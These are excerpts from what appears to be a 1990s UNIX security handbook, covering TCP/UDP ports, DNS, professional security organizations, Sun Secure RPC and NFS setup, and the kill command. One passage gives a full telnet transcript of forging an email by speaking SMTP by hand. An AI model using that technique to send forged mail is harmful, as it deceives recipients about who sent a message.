The TCP protocol uses two special bits in the packet header, SYN and ACK, to negotiate the creation of new connections. To open a TCP connection, the requesting host sends a packet that has the SYN bit set but does not have the ACK bit set. The receiving host acknowledges the request by sending back a packet that has both the SYN and the ACK bits set. Finally, the originating host sends a third packet, again with the ACK bit set, but this time with the SYN bit unset. This process is called the TCP "three-way handshake," and is shown in Figure 16.6. By looking for packets that have the ACK bit unset, one can distinguish packets requesting new connections from those being sent in response to connections that have already been created. This distinction is useful when constructing packet-filtering firewalls, as we shall see in Chapter 21.

Figure 16.6: The TCP/IP "three-way handshake"
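A heavily abridged packet trace, in the style of tools such as tcpdump (the hostnames, the originating port 1023, and the sequence numbers are invented for illustration), shows the same exchange on the wire:

client.1023 > server.login: S 1000:1000(0) win 4096           (SYN)
server.login > client.1023: S 2000:2000(0) ack 1001 win 4096  (SYN and ACK)
client.1023 > server.login: . ack 2001 win 4096               (ACK only)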


TCP is used for most Internet services that require the sustained synchronous transmission of a stream of data in one or two directions. For example, TCP is used for remote terminal service, file transfer, and electronic mail. TCP is also used for sending commands to displays using the X Window System.

Table 16.2 identifies some TCP services commonly enabled on UNIX machines. These services and port numbers are usually found in the /etc/services file.[10] (Note that non-UNIX hosts can run most of these services; the protocols are usually specified independent of any particular implementation.)

[10] A more extensive list of TCP and UDP ports and services may be found in Appendix G, Table of IP Services.

Table 16.2: Some Common TCP Services and Ports

TCP Port   Service Name   Function
7          echo           Echoes characters (for testing)
9          discard        Discards characters (for testing)
13         daytime        Time of day
19         chargen        Character generator
21         ftp            File Transfer Protocol (FTP)
23         telnet         Virtual terminal
25         smtp           Electronic mail
37         time           Time of day
42         nameserver     TCP nameservice
43         whois          NIC whois service
53         domain         Domain Name Service (DNS)
79         finger         User information
80         http           World Wide Web (WWW)
109        pop2           Post Office Protocol (POP)
110        pop3           Post Office Protocol (POP)
111        sunrpc         Sun Microsystems' Remote Procedure Call (RPC)
113        auth           Authentication Service
119        nntp           Network News Transfer Protocol (NNTP) (Usenet)
178        nsws           NeXTSTEP Window Server
512        exec           Executes commands on a remote UNIX host
513        login          Logs in to a remote UNIX host
514        shell          Retrieves a shell on a remote UNIX host
515        printer        Remote printing
540        uucp           Runs UUCP over TCP/IP (primarily used for transporting netnews)
2049       NFS            NFS over TCP
6000+      X              X Window System
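The /etc/services file that records these assignments is a plain text database with one entry per line, of the form name port/protocol [aliases]. An abridged excerpt might look like the following; the exact set of entries and aliases varies from system to system:

ftp        21/tcp
telnet     23/tcp
smtp       25/tcp    mail
domain     53/tcp
domain     53/udp
finger     79/tcp
http       80/tcp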

16.2.4.3 UDP

The User Datagram Protocol provides a simple, unreliable system for sending packets of data between two or more programs running on the same or different computers. "Unreliable" means that the operating system does not guarantee that every packet sent will be delivered, or that packets will be delivered in order. UDP does make its best effort to deliver the packets, however. On a LAN, UDP often approaches 100% reliability.

UDP's advantage is that it has less overhead than TCP - less overhead lets UDP-based services transmit information with as much as 10 times the throughput. UDP is used primarily for Sun's Network Filesystem, for NIS, for resolving hostnames, and for transmitting routing information. It is also used for services that aren't affected negatively if they miss an occasional packet, either because they will get another periodic update later or because the information isn't really that important. This includes services such as rwho, talk, and some time services.

UDP packets are often broadcast to a given port on every host that resides on the same local area network. Broadcast packets are used frequently for services such as time of day.

As with TCP, UDP packets are sent from a port on the sending host to another port on the receiving host. Each UDP packet also contains user data. If a program is listening to the particular port and is ready for the packet, the packet will be received. Otherwise, the packet will be ignored.

Ports are identified by 16-bit numbers. Table 16.3 lists some common UDP ports.

Table 16.3: Some Common UDP Services and Ports

UDP Port   Service Name   Function
7          echo           Returns the user's data in another datagram
9          discard        Does nothing
13         daytime        Returns time of day
19         chargen        Character generator
37         time           Returns time of day
53         domain         Domain Name Service (DNS)
69         tftp           Trivial File Transfer Protocol (TFTP)
111        sunrpc         Sun Microsystems' Remote Procedure Call (RPC) portmapper
123        ntp            Network Time Protocol (NTP)
161        snmp           Simple Network Management Protocol (SNMP)
512        biff           Alerts you to incoming mail (Biff was the name of a dog who barked when the mailman came)
513        who            Returns who is logged into the system
514        syslog         System logging facility
517        talk           Initiates a talk request
518        ntalk          The "new" talk request
520        route          Routing Information Protocol (RIP)
533        netwall        Write on every user's terminal
2049       NFS            (usually) Network Filesystem (NFS)

16.2.5 Clients and Servers

The Internet Protocol is based on the client/server model. Programs called clients initiate connections over the network to other programs called servers, which wait for the connections to be made. One example of a client/server pair is the network time system. The client program is the program that asks the network server for the time. The server program is the program that listens for these requests and transmits the correct time. In UNIX parlance, server programs that run in the background and wait for user requests are often known as daemons.

Clients and servers are normally different programs. For example, if you wish to log onto another machine, you can use the telnet program:

% telnet athens.com
Trying...
Connected to ATHENS.COM
Escape character is '^]'.
4.4 BSD Unix (ATHENS.COM)
login:

When you type telnet, the client telnet program on your computer (usually the program /usr/bin/telnet, or possibly /usr/ucb/telnet) connects to the telnet server (in this case, named /usr/etc/in.telnetd) running on the computer athens.com. As stated, clients and servers normally reside in different programs. One exception to this rule is the sendmail program, which includes the code for both the server and a client, bundled together in a single application.

The telnet program can also be used to connect to any other TCP port that has a process listening. For instance, you might connect to port 25 (the SMTP port) to fake some mail without going through the normal mailer:

% telnet control.mil 25
Trying 45.1.12.2 ...
Connected to hq.control.mil.
Escape character is '^]'.
220-hq.control.mil Sendmail 8.6.10 ready at Tue, 17 Oct 1995 20:00:09 -0500
220 ESMTP spoken here
HELO kaos.org
250 hq.control.mil Hello kaos.org, pleased to meet you
MAIL FROM:
250 ... Sender ok
RCPT TO:
250 ... Recipient ok
DATA
354 Enter mail, end with "." on a line by itself
To: agent99
From: Max
Subject: tonight

99,
I know I was supposed to take you out to dinner tonight, but I have
been captured by KAOS agents, and they won't let me out until they
finish torturing me. I hope you understand.

Love, Max
.
250 UAA01441 Message accepted for delivery
quit
221 hq.control.mil closing connection
Connection closed by foreign host.
%

16.2.6 Name Service

As we mentioned, in the early days of the Internet, a single /etc/hosts file contained the address and name of each computer on the Internet. But as the file grew to contain thousands of lines, and as changes to the list of names (or the namespace) started being made on a daily basis, a single /etc/hosts file soon became impossible to maintain. Instead, the Internet developed a distributed network-based naming service called the Domain Name Service (DNS).

DNS implements a large-scale distributed database for translating hostnames into IP addresses and vice versa, and for performing related name functions. The software performs this function by using the network to resolve each part of the hostname distinctly. For example, if a computer is trying to resolve the name girigiri.gbrmpa.gov.au, it would first get the address of the root domain server (usually stored in a file) and ask that machine for the address of the au domain server. The computer would then ask the au domain server for the address of the gov.au domain server, and then would ask that machine for the address of the gbrmpa.gov.au domain server. Finally, the computer would ask the gbrmpa.gov.au domain server for the address of the computer called girigiri.gbrmpa.gov.au. (Name resolution is shown in Figure 16.7.) A variety of caching techniques are employed to minimize overall network traffic.

Figure 16.7: The DNS tree hierarchy for name resolution


DNS is based on UDP, but can also use a TCP connection for some operations.

16.2.6.1 DNS under UNIX

The standard UNIX implementation of DNS is called bind and was originally written at the University of California at Berkeley. This implementation is based on three parts: a library for the client side, and two programs for the server:

Resolver

The resolver library uses DNS to implement the gethostbyname() and gethostbyaddr() library calls. It is linked into any program that needs to perform name resolution using DNS. The first time that a program linked with the resolver attempts to resolve a hostname, the library reads the /etc/resolv.conf file to determine the IP address of the nameserver to be used for name resolution. The resolv.conf file can also contain the program's default domain, which is used to resolve unqualified hostnames (such as girigiri, as opposed to girigiri.gbrmpa.gov.au).
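A minimal /etc/resolv.conf for the girigiri example might therefore read as follows; the nameserver addresses are placeholders, not real servers:

domain      gbrmpa.gov.au
nameserver  192.42.0.1
nameserver  192.42.0.2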

named (or in.named)

The named daemon is the program that implements the server side of the DNS system. When named is started, it reads a boot file (usually /etc/named.boot) that directs the program to the location of its auxiliary files. These files then initialize the named daemon with the location of the root domain servers. If the named daemon is the nameserver for a domain or a subdomain (which is usually the case), the configuration file instructs the program to read in the domain's host tables or get them from a "master" server.

named-xfer

This is the program used to transfer zones from primary to secondary servers. It is usually installed as /etc/named-xfer and is run by the secondary server to perform a zone transfer. The named-xfer program connects to the named program running on the primary server and performs the transfer using TCP.

More details about DNS and the BIND name server may be found in the O'Reilly & Associates book DNS and BIND by Paul Albitz and Cricket Liu.

16.2.6.2 Other naming services

In addition to DNS, there are at least four vendor-specific systems for providing nameservice and other information to networked workstations. They are:

NIS (Sun Microsystems)

Originally called "Yellow Pages," Sun's Network Information System (NIS) creates a simple mechanism whereby files such as /etc/passwd and /etc/hosts from one computer can be shared by another. Although NIS has numerous security problems, it is widely used.[11]

[11] We describe NIS and NIS+ in more detail in Chapter 19, RPC, NIS, NIS+, and Kerberos.

NIS+ (Sun Microsystems)

NIS+ is a total rewrite of NIS, and it dramatically increases both security and flexibility. Nevertheless, NIS+ is not used as widely as NIS.

NetInfo (NeXT, Inc.)

NetInfo is a distributed database similar to NIS+. NetInfo is tightly integrated into NeXT's NEXTSTEP operating system and is available for other operating systems from a third party.

DCE (Open Software Foundation)

OSF's Distributed Computing Environment offers yet another system for distributing a database of information, such as usernames and host addresses, to networked workstations.

All of these systems are designed to distribute a variety of administrative information throughout a network. All of these systems must also use DNS to resolve hostnames outside the local organization.



Appendix F
F. Organizations

Contents:
Professional Organizations
U. S. Government Organizations
Emergency Response Organizations

Here we have collected information on a number of useful organizations you can contact for more information and additional assistance.

F.1 Professional Organizations

You may find the following organizations helpful. The first few provide newsletters, training, and conferences. FIRST organizations may be able to provide assistance in an emergency.

F.1.1 Association for Computing Machinery (ACM)

The Association for Computing Machinery is the oldest of the computer science professional organizations. It publishes many scholarly journals and annually sponsors dozens of research and community-oriented conferences and workshops. The ACM is also involved with issues of education, professional development, and scientific progress. It has a number of special interest groups (SIGs) that are concerned with security and computer use. These include the SIG on Security, Audit and Control; the SIG on Operating Systems; the SIG on Computers and Society; and the SIG on Software Engineering.

The ACM may be contacted at:

ACM Headquarters
11 West 42 Street
New York, NY 10036
+1-212-869-7440

The ACM has an extensive set of electronic resources, including information on its conferences and special interest groups. The information provided through the World Wide Web page is especially comprehensive and well organized:


http://www.acm.org

F.1.2 American Society for Industrial Security (ASIS)

The American Society for Industrial Security is a professional organization for those working in the security field. ASIS has been in existence for 35 years and has 22,000 members in 175 local chapters worldwide. Its 25 standing committees focus on particular areas of security, including computer security. The group publishes a monthly magazine devoted to security and loss management. ASIS also sponsors meetings and other group activities. Membership is open only to individuals involved with security at a management level.

More information may be obtained from:

American Society for Industrial Security
1655 North Fort Meyer Drive, Suite 1200
Arlington, VA 22209
+1-703-522-5800

F.1.3 Computer Security Institute (CSI)

The Computer Security Institute was established in 1974 as a multiservice organization dedicated to helping its members safeguard their electronic data processing resources. CSI sponsors workshops and conferences on security, publishes a research journal and a newsletter devoted to computer security, and serves as a clearinghouse for security information. The Institute offers many other services to members and the community on a for-profit basis. Of particular use is an annual Computer Security Buyer's Guide that lists sources of software, literature, and security consulting.

You may contact CSI at:

Computer Security Institute
600 Harrison Street
San Francisco, CA 94107
+1-415-905-2626

F.1.4 High Technology Crimes Investigation Association (HTCIA)

The HTCIA is a professional organization for individuals involved with the investigation and prosecution of high-technology crime, including computer crime. There are chapters throughout the U.S., and some are forming in other countries. Information is available via the WWW page:

http://htcia.org

John Smith, of the Northern California chapter, will provide contact information to interested parties who do not have WWW access:

Voice: +1-408-299-7401
Email: jsmith@netcom.com


F.1.5 Information Systems Security Association (ISSA)

The ISSA is an international organization of information security professionals and practitioners. It provides education forums, publications, and peer interaction opportunities that enhance the knowledge, skill, and professional growth of its members.

For more information about ISSA, contact:

ISSA Headquarters
4350 DiPaolo Center, Suite C
Glenview, IL 60025-5212
+1-708-699-6441 / +1-708-699-6369

ISSA has a WWW page at:

http://www.uhsa.uh.edu/issa

F.1.6 The Internet Society

The Internet Society sponsors many activities and events related to the Internet, including an annual symposium on network security. For more information, contact the Internet Society:

http://www.isoc.org

You may also contact:

+1-703-648-9888
Email: membership@isoc.org

F.1.7 IEEE Computer Society

With more than 100,000 members, the Computer Society is the largest member society of the Institute of Electrical and Electronics Engineers (IEEE). It too is involved with scholarly publications, conferences and workshops, professional education, technical standards, and other activities designed to promote the theory and practice of computer science and engineering. The IEEE-CS also has special interest groups, including a Technical Committee on Security and Privacy, a Technical Committee on Operating Systems, and a Technical Committee on Software Engineering. More information on the Computer Society may be obtained from:

IEEE Computer Society
1730 Massachusetts Avenue N.W.
Washington, DC 20036-1903
(800) 678-4333

The Computer Society has a set of WWW pages starting at:

http://www.computer.org

The Computer Society's Technical Committee on Security and Privacy has a number of resources, including an online newsletter:

http://www.itd.nrl.navy.mil/ITD/5540/ieee

F.1.8 IFIP Technical Committee 11

The International Federation for Information Processing, Technical Committee 11, is devoted to research, education, and communication about information systems security. The working groups of the committee sponsor various activities, including conferences, throughout the world. More information may be obtained from:

http://www.iaik.tu-graz.ac.at/tc11_hom.html

F.1.9 National Computer Security Association (NCSA)

The National Computer Security Association is a commercial organization devoted to computer security. It sponsors tutorials, exhibitions, and other activities with a particular emphasis on PC users. NCSA may be contacted at:

National Computer Security Association
10 South Courthouse Avenue
Carlisle, PA 17013
+1-717-258-1816
office@ncsa.com

The NCSA has a WWW page at:

http://www.ncsa.com

F.1.10 USENIX/SAGE

The USENIX Association is a nonprofit education organization for users of UNIX and UNIX-like systems. The Association publishes a refereed journal (Computing Systems) and a newsletter, sponsors numerous conferences, and has representatives on international standards bodies. The Association sponsors an annual workshop on UNIX security and another on systems administration.

SAGE stands for the Systems Administrators Guild. It is a special technical group of the USENIX Association. To join SAGE, you must also be a member of USENIX.

Information on USENIX and SAGE can be obtained from:

USENIX Association
2560 Ninth Street, Suite 215
Berkeley, CA 94703
+1-510-528-8649
office@usenix.org

The USENIX WWW page is at:


http://www.usenix.org



Chapter 19
RPC, NIS, NIS+, and Kerberos

19.3 Secure RPC (AUTH_DES)

In the late 1980s, Sun Microsystems developed a system for improving UNIX network security. Called Secure RPC, Sun's system was first released with the SunOS 4.0 operating system. Although early versions of Secure RPC were difficult to use, later releases of the Solaris operating system have integrated Secure RPC into Sun's NIS+ network information system (described later in this chapter), which makes administration very simple.

Secure RPC is based on a combination of public key cryptography and secret key cryptography, which we describe in Chapter 6, Cryptography. Sun's implementation uses the Diffie-Hellman mechanism for key exchange between users, and DES secret key cryptography for encrypting information that is sent over the network. DES is also used to encrypt the user's secret key that is stored in a central network server. This encryption eliminates the need for users to memorize or carry around the hundred-digit numbers that make up their secret keys.

Secure RPC solves many of the problems of AUTH_UNIX style authentication. Because both users and computers must be authenticated, it eliminates many of the spoofing problems to which other systems lend themselves. Indeed, when used with higher-level protocols, such as NFS, Secure RPC can bring unprecedented security to the networked environment. Nevertheless, Secure RPC has not enjoyed the widespread adoption that Sun's original RPC did. There are probably several reasons:

● The University of California at Berkeley did not write a free implementation of Secure RPC.[5] As a result, the only way for vendors to implement Secure RPC was to write their own version (an expensive proposition) or to license the code from Sun.

[5] Because Secure RPC is based on public key cryptography, using it within the United States would have required a license from the holder of the particular patents in question. At the time that Berkeley was developing its free version of the UNIX operating system, the holder of the public key cryptography patents, a California partnership called Public Key Partners, was notoriously hesitant to give licenses to people who were writing free versions of programs implementing the PKP algorithms. This situation might change after 1997, when the patents covering Diffie-Hellman cryptography expire.

● For whatever reason, many UNIX vendors were unwilling or unable to license or implement Secure RPC from Sun. Thus, it is not possible to interoperate with those systems.

19.3.1 Secure RPC Authentication

Secure RPC authentication is based on the Diffie-Hellman exponential key exchange system. Each Secure RPC principal[6] has a secret key and a public key, both of which are stored on the Secure RPC server. The public key is stored unencrypted; the secret key is stored encrypted with the principal's password. Both keys are typically hexadecimal numbers of several hundred digits.

[6] Secure RPC principals are users that have Secure RPC passwords and computers that are configured to use Secure RPC.

A Secure RPC principal proves his, her, or its identity by being able to decrypt the stored secret key and by participating in the Diffie-Hellman key exchange. Each principal combines its secret key with the other's public key, allowing both to arrive independently at a common, mutually known key. This key is then used to exchange a session key.
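The arithmetic behind this exchange is easy to sketch. The following toy example, written in Python, uses a small made-up modulus and base (they are not Sun's actual Diffie-Hellman parameters, which are hundreds of digits long) to show how each side combines its own secret key with the other's public key and independently arrives at the same common key:

# A toy Diffie-Hellman exchange.  P and G are small made-up parameters,
# chosen for readability only; real Secure RPC keys are far larger.
P = 4294967291          # a small prime modulus (illustrative assumption)
G = 5                   # a small public base   (illustrative assumption)

def public_key(secret):
    # The public key that would be published on the Secure RPC server.
    return pow(G, secret, P)

def common_key(my_secret, their_public):
    # Combine my secret key with the other party's public key.
    return pow(their_public, my_secret, P)

# Each principal picks a secret key and publishes the matching public key.
user_secret, server_secret = 123456789, 987654321
user_public, server_public = public_key(user_secret), public_key(server_secret)

# Both sides independently arrive at the same common, mutually known key,
# which is then used to exchange the session key.
assert common_key(user_secret, server_public) == common_key(server_secret, user_public)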

19.3.1.1 Proving your identity

The way you prove your identity with a public key system is by knowing your secret key. Unfortunately, most people aren't good at remembering hundred-digit numbers, and deriving a good {public key, secret key} pair from a UNIX password is relatively difficult.

Sun solves these problems by distributing a database consisting of usernames, public keys, and encrypted secret keys using the Sun NIS or NIS+ network database system. (Both NIS and NIS+ are described later in this chapter.) The secret key is encrypted using the user's UNIX password as the key and the DES encryption algorithm. If you know your UNIX password, your workstation software can get your secret key and decrypt it.

For each user, the following information is maintained:[7]

[7] The information could be maintained in the files /etc/publickey and /etc/netid. If you are using NIS, the data is stored in the NIS maps publickey.byname and netid.byname. With NIS+, all of this information is combined in a single NIS+ table, cred.org_dir.

Netname or canonical name
    This is the user's definitive name on the network. An example is fred.sun.com, which signifies the user fred in the domain sun.com. Older versions of NIS used the form UID.UNIX@domain.

User's public key
    A hexadecimal representation of the user's public key.

User's secret key
    A hexadecimal representation of the user's secret key, encrypted using the user's password.

The user's keys are created with either the chkey command or the nisaddcred command. Normally, this process is transparent to the user.

When the user logs in to a computer running Secure RPC, the computer obtains a copy of the user's encrypted secret key. The computer then attempts to decrypt the secret key using the user's provided password. The secret key must now be stored for use in communication with the Secure RPC server. In Version 4.1 and above, the unencrypted key is kept in the memory of the keyserv key server process. (In the original version of Secure RPC, shipped with SunOS 4.0, the unencrypted secret key was stored in the /etc/keystore file. This was less secure, as anyone gaining access to the user's workstation as either that user or as root could easily read the user's secret key.)

Next, the software on the workstation uses the user's secret key and the server's public key to generate a session key. (The server, meanwhile, has done the same thing using its secret key and the user's public key.) The workstation then generates a random 56-bit conversation key and sends it to the server, encrypted with the session key. The conversation key is used for the duration of the login and is stored in the key server process.
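This handshake can be pictured with another small sketch. Here the session key is just a placeholder number and XOR stands in for DES; both are simplifications made for readability, not part of Sun's implementation:

# A sketch of the conversation-key exchange.  SESSION_KEY is a placeholder
# value (it would come from the Diffie-Hellman computation), and XOR stands
# in for DES; both are assumptions made for illustration only.
import os

SESSION_KEY = 0x0123456789ABCDEF

def toy_encrypt(key, value):
    # Stand-in for DES: XOR a 56-bit value with the low 56 bits of the key.
    return value ^ (key & (2**56 - 1))

toy_decrypt = toy_encrypt               # XOR is its own inverse

# The workstation picks a random 56-bit conversation key...
conversation_key = int.from_bytes(os.urandom(7), "big")

# ...sends it to the server encrypted with the shared session key...
on_the_wire = toy_encrypt(SESSION_KEY, conversation_key)

# ...and the server, which computed the same session key, recovers it.
assert toy_decrypt(SESSION_KEY, on_the_wire) == conversation_key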

The file server knows that the user is who he claims to be because:

●   The packet that the user sent was encrypted using the conversation key.

●   The only way that the user could know the conversation key would be by generating it, using the server's public key and the user's secret key.

●   To know the user's secret key, the workstation had to look up the secret key using NIS and decrypt it.

●   To decrypt the encrypted secret key, the user had to have known the key that it was encrypted with - which is, in fact, the user's password.

Notice the following:

●   The user's password is never transmitted over the network.

●   The only time the secret key is transmitted over the network is when it is encrypted using the user's password.

●   There is no "secret" information on the file server that must be protected from attackers.[8]

    [8] In contrast, the Kerberos system, as we shall see, requires that the master Kerberos Server be protected literally with lock and key; if the information stored on the Kerberos Server is stolen by an attacker, the entire system is compromised.

●   The entire security of the system depends on the difficulty of breaking a 56-bit key.

Because public key encryption is slow and difficult to use for large amounts of data, it is used only for initially proving your identity and exchanging the session key. Secure RPC then uses the session key and DES encryption (described in Chapter 6) for all subsequent communications between the workstation and the server.


19.3.1.2 Using Secure RPC services

After your workstation and the server have agreed upon a session key, Secure RPC authenticates all RPC requests.

When your workstation communicates with a server, the user provides a netname, which the server is supposed to translate automatically into a local UID and GID. Ideally, this means that the user's UID on the server does not have to be the same as the user's UID on the workstation. In practice, most organizations insist that their users have a single UID throughout the organization, so the ability of Secure RPC to map UIDs from one computer to another is not terribly important.

When your session key expires, your workstation and the server automatically renegotiate a new session key.

19.3.1.3 Setting the window

Inside the header sent with every Secure RPC request is a timestamp. This timestamp prevents an attacker from capturing the packets of an active session and replaying them at a later time.

For a timestamp-based system to operate properly, both the client and the server must agree on what time it is. Unfortunately, the real-time clocks on computers sometimes drift in relation to one another. This can present a serious problem to the user of Secure RPC: if the clock on the workstation and the clock on the file server drift too far apart, the server will not accept any more requests from the client! The client and server will then have to reauthenticate each other.

Because reauthenticating takes time, Secure RPC allows the workstation system administrator to set the "window" that the server uses to determine how far the client's clock can drift and remain acceptable. Obviously, using a large window reduces the danger of drift. Unfortunately, large windows also increase the chance of a playback attack, in which an attacker sniffs a packet from the network and then uses the authenticated credentials for his or her own purposes: any packet that is intercepted remains good for a longer period of time.

Solaris versions 2.3 and 2.4 use a default window of 60 minutes; Solaris version 2.5 uses a window of 300 seconds (5 minutes). The smaller window is what Sun Microsystems recommends for security-sensitive applications.

The size of the Secure RPC window is set in the kernel by the variable authdes_win, which stores the value of the window in seconds. On a System V Release 4 machine such as Solaris 2.x, you modify the authdes_win variable from the /etc/system file:

set nfs:authdes_win=300

You then reboot with the modified /etc/system file.

If you have a SunOS system, you can modify the value of _authdes_win by using the adb debugger program. Execute the following commands as superuser:

# adb -w /vmunix
authdes_win?D                          The default window
_authdes_win:
_authdes_win:   3600
authdes_win?W0t600                     Write the result out
_authdes_win:   0xe10   =       0x258
$q
#

You do not need to reboot under SunOS, as the adb command modifies both the kernel and the running image.

Using a network time service such as NTP (the Network Time Protocol) can eliminate time skew between servers and workstations. Even without NTP, clocks typically don't skew by more than five seconds during the course of a single day's operation. However, NTP servers can get skewed, and can sometimes even be maliciously led astray of the correct time. If you are depending on the correct time for a protocol, you might consider obtaining a clock that synchronizes with a radio time signal, so that you can set up your own time server.
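The server-side test implied by authdes_win amounts to a simple comparison. The sketch below is illustrative Python, not Sun's code; it accepts a request only when the client's timestamp falls within the window:

# Illustrative only; the function name and structure are assumptions.
import time

AUTHDES_WIN = 300                       # window in seconds, as set above

def timestamp_acceptable(request_timestamp, window=AUTHDES_WIN, now=None):
    # Accept a request only if the client's clock is within the window.
    now = time.time() if now is None else now
    return abs(now - request_timestamp) <= window

assert timestamp_acceptable(time.time() - 240)        # 4 minutes of skew: OK
assert not timestamp_acceptable(time.time() - 600)    # 10 minutes: reauthenticate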

19.3.2 Setting Up Secure RPC with NIS

To use Secure RPC, your client computers need a way of obtaining keys from the Secure RPC server. You can distribute the keys in standard UNIX files, or you can have them distributed automatically with either NIS or NIS+.[9]

[9] If you are using Secure RPC on something other than a Sun system, be sure to check your documentation - there may be some other way to distribute the key information.

The easiest way to set up Secure RPC is to set up NIS+. Sun's NIS+ requires Secure RPC to function properly; as a result, the NIS+ installation procedure automatically creates the appropriate Secure RPC keys and credentials, and when you add new NIS+ users, their Secure RPC keys are created automatically.

Running Secure RPC with NIS is more difficult: you will need to create the keys manually and place them in the appropriate NIS maps. If you are not using NIS, you can simply place the keys in the file /etc/publickey. Refer to your vendor documentation for explicit instructions on how to set up Secure RPC; nevertheless, the following guide may be helpful.

19.3.2.1 Creating passwords for users

Before you enable Secure RPC, make sure that every user has been assigned a public key and a secret key. Check the file /etc/publickey on the master NIS server. If a user doesn't have an entry in the database, you can create one by becoming the superuser on the NIS master server and typing:

# newkey -u username

Alternatively, you can create an entry in the database for the special user nobody. After an entry is created for nobody, users can run the chkey program on any client to create their own entries in the database.

19.3.2.2 Creating passwords for hosts

Secure RPC also allows you to create public key/secret key pairs for the superuser account on each host of your network. To do so, type:

# newkey -h hostname

19.3.2.3 Making sure Secure RPC programs are running on every workstation

Log into a workstation and make sure that the keyserv and ypbind daemons are running. These programs should be started by a command in the appropriate system startup file (e.g., /etc/rc.local for BSD-derived systems, and /etc/rc2.d/s?rpc for System V-derived systems). You also need to make sure that rpc.ypupdated is run from either inetd.conf or rc.local on the server.

You can check for these daemons with the ps command (use the -ef flags to ps on a Solaris 2.x system):

% ps aux | egrep 'keyserv|ypbind'
root      63  0.0  0.0   56   32 ?  IW   Jul 30  0:30 keyserv
root      60  0.3  0.7  928  200 ?  S    Jul 30  3:10 ypbind

You should also log onto an NIS client and make sure that the publickey map is available; use the ypcat publickey command. If the map is not available, log into the server and push it.

NOTE: There is a very nasty vulnerability in rpc.ypupdated that allows external users access on servers or clients. See CERT advisory CA-95:17, "rpc.ypupdated.vul."

19.3.2.4 Using Secure NFS

Once you've gone to all of the trouble of setting up Secure RPC, your next step is to set up Secure NFS. We'll cover this in detail in Chapter 20, but if you want to go ahead and do it right now, here are the steps to follow for a BSD-derived system such as SunOS; the procedure is the same for other systems, but the filenames differ.

On the file server, edit the /etc/exports file and add the -secure option for every filesystem that should be exported using Secure NFS. For example, suppose the old /etc/exports file exported the mail spool directory /usr/spool/mail with the line:

/usr/spool/mail -access=allws

To make the filesystem be exported using Secure NFS, change the line to read:

/usr/spool/mail -secure,access=allws

After changing /etc/exports, you need to run exportfs (or its equivalent).

19.3.2.5 Mounting a secure filesystem

You must modify the /etc/fstab file on every workstation that mounts a Secure NFS filesystem to include secure as a mount option.

To continue the above example, suppose your workstation mounted the /usr/spool/mail directory with the line:

mailhub:/usr/spool/mail /usr/spool/mail nfs rw,intr,bg 0 0

To mount this filesystem with the secure option, change the line to read:

mailhub:/usr/spool/mail /usr/spool/mail nfs rw,intr,bg,secure 0 0

After changing /etc/fstab, you need to unmount and remount the filesystems.

19.3.3 Using Secure RPC

Using Secure RPC is very similar to using standard RPC. If you log in by typing your username and password (either at the login window on the console or by using telnet or rlogin to reach your machine), your secret key is automatically decrypted and stored in the key server. Secure RPC automatically performs the authentication "handshake" every time you contact a service for the first time. In the event that your session key expires - either because of a time expiration or a crash and reboot - Secure RPC automatically obtains another session key.

If you log in over the network without having to type a password - for example, if you use rlogin to reach your computer from a trusted machine - you will need to use the keylogin program to have your secret key calculated and stored in the key server. Unfortunately, this results in your key being sent over the network, which makes it subject to eavesdropping.

Before you log out of your workstation, be sure to run the keylogout program to destroy the copy of your secret key stored in the key server. If you use csh as your shell, you can run this program automatically by placing the command keylogout in your ~/.logout file:

#
# ~/.logout file
#
# Destroy secret keys
keylogout

19.3.4 Limitations of Secure RPC

Sun's Secure RPC represents a quantum leap in security over Sun's standard RPC. This is good news for sites that use NFS: with Secure RPC, NFS can be used with relative safety. Nevertheless, Secure RPC is not without its problems:

●   Every network client must be individually modified for use with Secure RPC. Although Secure RPC is a transparent modification to Sun's underlying RPC system, the current design of Sun's RPC library requires an application program to specify individually which authentication system (AUTH_NONE, AUTH_UNIX, AUTH_DES, or AUTH_KERB) the program wants to use. For this reason, every client that uses a network service must be individually modified to use AUTH_DES authentication.

    Although the modifications required are trivial, a better approach would be to allow the user to specify the requested authentication service in an environment variable, or on some other per-user or per-site, rather than per-program, basis.[10]

    [10] We said the same thing five years ago, in the first version of this book.

●   There is a performance penalty. Secure RPC penalizes every RPC transaction that uses it, because the RPC authenticator must be decrypted using DES to verify each transmission. Fortunately, the performance penalty is small: on a Sun-4, only 1.5 milliseconds are required for the decryption. In comparison, the time to complete an average NFS transaction is about 20 milliseconds, making the performance penalty about eight percent.

●   Secure RPC does not provide for data integrity or confidentiality. Secure RPC authenticates the user, but it does not protect the transmitted data with either encryption or digital signatures. It is the responsibility of programs using Secure RPC to encrypt data using a suitable key and algorithm.

●   It may be possible to break the public key. Any piece of information encrypted with the Diffie-Hellman public key encryption system used in Secure RPC can be decrypted if an attacker can calculate the discrete logarithm of the public key. In 1989, Brian LaMacchia and Andrew Odlyzko at AT&T's Bell Laboratories in New Jersey discovered a significant performance improvement for the computation of discrete logarithms. Since then, numerous other advances in this field of mathematics have taken place. Secure RPC makes the public key and the encrypted secret key available to RPC client computers on the network. Thus, keys that are secure today may be broken tomorrow.

●   It may be possible to break the secret key. The Secure RPC secret key is encrypted with a 56-bit DES key and is made publicly available on the network server. As computers become faster, a brute force attack against the user's encrypted secret key may become practical.

In the final analysis, Secure RPC appears to provide much better protection than many other approaches, especially with multiuser machines, and it is clearly better than plain RPC. Unfortunately, because Secure RPC requires the use of either NIS or NIS+, some multi-vendor sites have chosen not to use it. These sites should consider DCE, which provides a workable solution for a heterogeneous environment.



Appendix C
UNIX Processes

C.4 The kill Command

You can use the kill command to stop or merely pause the execution of a process. You might want to kill a "runaway" process that is consuming CPU and memory for no apparent reason; you might also want to kill the processes belonging to an intruder. kill works by sending a signal to a process; particularly useful signals are described in detail below. The syntax of the kill command is:

kill [-signal] process-IDs

Most modern versions of UNIX allow signals to be specified by name. To send a hangup to process #1, for example, type:

# kill -HUP 1

With some older versions of UNIX, you must specify the signal by number:

# kill -1 1

The superuser can kill any process; other users can kill only their own processes. You can kill many processes at a time by listing all of their PIDs on the command line:

# kill -HUP 1023 3421 3221

By default, kill sends signal 15 (SIGTERM), the process-terminate signal. Berkeley-derived systems also have some additional options to the kill command:

●   If you specify 0 as the PID, the signal is sent to all the processes in your process group.

●   If you specify -1 as the PID and you are not the superuser, the signal is sent to all processes having the same UID as you.

●   If you specify -1 as the PID and you are the superuser, the signal is sent to all processes except system processes, process #1, and yourself.

●   If you specify any other negative value, the signal is sent to all processes in the process group numbered the same as the absolute value of your argument.

To send any signal, you must have the same real or effective UID as the target processes, or you must be operating as the superuser.

